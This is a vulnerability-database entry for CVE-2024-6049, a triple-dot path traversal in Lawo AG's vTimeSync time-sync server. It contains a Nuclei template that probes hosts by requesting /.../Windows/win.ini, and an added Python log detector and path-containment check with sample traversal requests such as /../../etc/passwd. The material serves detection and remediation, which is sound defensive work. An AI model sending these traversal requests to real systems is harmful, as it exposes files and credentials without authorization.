| Title | Published | Views | Family |
|---|---|---|---|
| CVE-2024-6049 | 24 Oct 2024 10:57 | – | circl |
| Lawo AG vsm LTC Time Sync Path Traversal Vulnerability | 24 Oct 2024 00:00 | – | cnnvd |
| CVE-2024-6049 | 24 Oct 2024 07:47 | – | cve |
| CVE-2024-6049 Unauthenticated Path Traversal | 24 Oct 2024 07:47 | – | cvelist |
| CVE-2024-6049 | 24 Oct 2024 08:15 | – | nvd |
| Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 2017 00:00 | – | openvas |
| Lawo AG vsm LTC Time Sync Path Traversal | 25 Oct 2024 00:00 | – | packetstorm |
| CVE-2024-6049 | 23 May 2025 08:02 | – | redhatcve |
| CVE-2024-6049 Unauthenticated Path Traversal | 24 Oct 2024 07:47 | – | vulnrichment |
```yaml
id: CVE-2024-6049

info:
  name: Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal
  author: s4e-io
  severity: high
  description: |
    The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e.g. .exe or .txt.
  impact: |
    Unauthenticated attackers can exploit triple dot path traversal to download arbitrary files from the operating system, potentially exposing configuration files and credentials.
  remediation: |
    Update Lawo AG vsm LTC Time Sync (vTimeSync) to the latest version that addresses the path traversal vulnerability.
  reference:
    - https://lawo.com/lawo-downloads/
    - https://r.sec-consult.com/lawo
    - https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html
    - https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/
    - https://nvd.nist.gov/vuln/detail/cve-2024-6049
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-6049
    cwe-id: CWE-32
    epss-score: 0.04325
    epss-percentile: 0.89997
  metadata:
    max-request: 2
  tags: cve,cve2024,lawo,vtimesync,lfi,vuln

# Request 2 is only sent when request 1 matches.
flow: http(1) && http(2)

http:
  # Request 1: fingerprint the product. The matcher is internal, so it gates
  # the flow without producing a finding on its own.
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    matchers:
      - type: word
        part: body
        words:
          - "vTimeSync"
          - "Lawo"
        internal: true
        case-insensitive: true

  # Request 2: probe the triple-dot traversal against a well-known file that
  # has a file extension (the advisory's stated limitation) and check for its
  # known contents.
  - raw:
      - |
        GET /.../.../.../.../.../.../.../.../.../Windows/win.ini HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "bit app support", "fonts", "extensions")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100c4fbaaf1b275359dbebb258caae8601aebd3eb11d826c724f63f3a1f419f4d32022024d1ad237c51c7406f21421f70a99f90d5f04cdb9f94ae4e7e9805fb1c1b678b:922c64590222798bb761d5b6d8e72950
```
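The template above confirms the weakness on a live host; on the defender side, the same request shape can be spotted in web-server logs and rejected in a file-serving handler. The following Python is an added example and is not part of the Nuclei template, the Vulners page, or any Lawo code. It parses constructed Common Log Format lines, flags requests whose decoded path contains a segment made only of dots (the `...` form this template probes for, as well as the classic `..`, including percent-encoded and backslash variants), and shows a root-containment check that rejects such segments before a path is resolved. The log lines, the web root `/srv/www`, and the function names are assumptions made for the example.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not from any real server.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Oct/2024:10:57:01 +0000] "GET / HTTP/1.1" 200 1532
10.0.0.5 - - [24/Oct/2024:10:57:02 +0000] "GET /.../.../.../.../Windows/win.ini HTTP/1.1" 200 92
10.0.0.7 - - [24/Oct/2024:10:58:10 +0000] "GET /%2e%2e%2e/%2e%2e%2e/Windows/win.ini HTTP/1.1" 200 92
10.0.0.9 - - [24/Oct/2024:10:59:00 +0000] "GET /static/app.js HTTP/1.1" 200 4410
10.0.0.9 - - [24/Oct/2024:10:59:30 +0000] "GET /../../etc/passwd HTTP/1.1" 403 0
10.0.0.9 - - [24/Oct/2024:11:00:00 +0000] "GET /docs/v1.2.3/readme.txt HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# A path segment consisting only of dots, two or more: "..", "...", "....".
# Version-like names such as "v1.2.3" contain non-dot characters and do not match.
DOT_SEGMENT_RE = re.compile(r'(?:^|/)\.{2,}(?:/|$)')


def decode_path(raw_path):
    """Percent-decode up to twice (to catch double encoding) and fold
    backslashes to slashes so Windows-style separators are seen as well."""
    p = raw_path
    for _ in range(2):
        d = unquote(p)
        if d == p:
            break
        p = d
    return p.replace("\\", "/")


def is_traversal_attempt(raw_path):
    """True if the decoded request path (query string removed) contains a
    dots-only segment."""
    path = decode_path(raw_path).split("?", 1)[0]
    return bool(DOT_SEGMENT_RE.search(path))


def find_traversal_attempts(log_text):
    """Return (ip, raw path, status) for every parsable log line whose
    path looks like a traversal attempt. Status 200 on such a line is
    the case worth escalating: the server may have served the file."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        if is_traversal_attempt(m["path"]):
            hits.append((m["ip"], m["path"], int(m["status"])))
    return hits


def resolve_under_root(web_root, request_path):
    """Hardened handler-side check: reject dots-only segments outright
    (the OS might reinterpret them, which is the '...' problem), then
    canonicalise and confirm the result stays inside web_root.
    Returns the resolved path or None when the request must be refused."""
    decoded = decode_path(request_path).split("?", 1)[0]
    if DOT_SEGMENT_RE.search(decoded):
        return None
    root = posixpath.normpath(web_root)
    joined = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if joined != root and not joined.startswith(root + "/"):
        return None
    return joined


if __name__ == "__main__":
    for ip, path, status in find_traversal_attempts(SAMPLE_LOG):
        flag = "SERVED" if status == 200 else "blocked"
        print(f"{ip} {status} {flag} {path}")
```

Running the block prints the three suspicious lines from the constructed log; the two with status 200 are the ones to triage first, since a 200 on a traversal-shaped request is exactly what the template's second matcher looks for.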